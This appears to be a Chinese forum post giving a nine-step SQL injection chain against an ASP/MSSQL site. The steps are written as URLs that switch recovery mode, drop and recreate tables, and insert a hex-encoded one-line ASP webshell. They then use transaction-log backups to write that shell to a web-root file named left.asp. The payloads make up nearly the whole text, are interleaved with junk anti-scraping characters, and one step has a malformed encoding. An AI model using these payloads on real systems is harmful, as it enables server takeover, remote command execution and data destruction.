第一步* n7 d$ F$ H' g1 ?4 M
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--. C g1 \! l. z
' k. P4 t* f" t) @- ?
第二步:
3 z& R( J! A8 o* f( @http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& s5 o* p5 f* `5 W3 |3 d& `4 T3 E V% E4 Q) l W; f" _5 b! ~
第三步; }* ]) @' L5 U1 S9 o
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--: t/ u E5 [( y6 d: Y1 A9 k' }: b
7 u1 d, j4 d v0 q0 s# M0 B第四步* \3 C& f- w/ F6 |' _, h. R1 Z
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
9 y l5 U7 @- ~9 Q; F& s* [4 P
5 p) ?2 }/ W T第五步9 ~# J% \" r8 v/ e2 x: m2 H
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
+ j9 ^' I; t" `2 [$ V7 f. y4 ^+ @4 C
第六步0 r7 n7 m/ q U! F9 L
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--! x4 Z% ^9 |# K! e
5 ]$ P6 f y3 t! k9 [
第七步" D( ?/ w1 S# e, L
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
' F& a5 J3 L J( A; R* ?1 H
0 }- M* G: u, l* D( Y. N第八步
, ^2 ~9 c2 Z% C Zhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
$ V& i1 K% t& @7 z: t' I3 m# T
. j. T, Y7 b k; f4 m3 f第九步
% u: L4 A7 i, C1 o7 T4 Ihttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--5 K# T5 R; h$ M- g9 y! t: x
|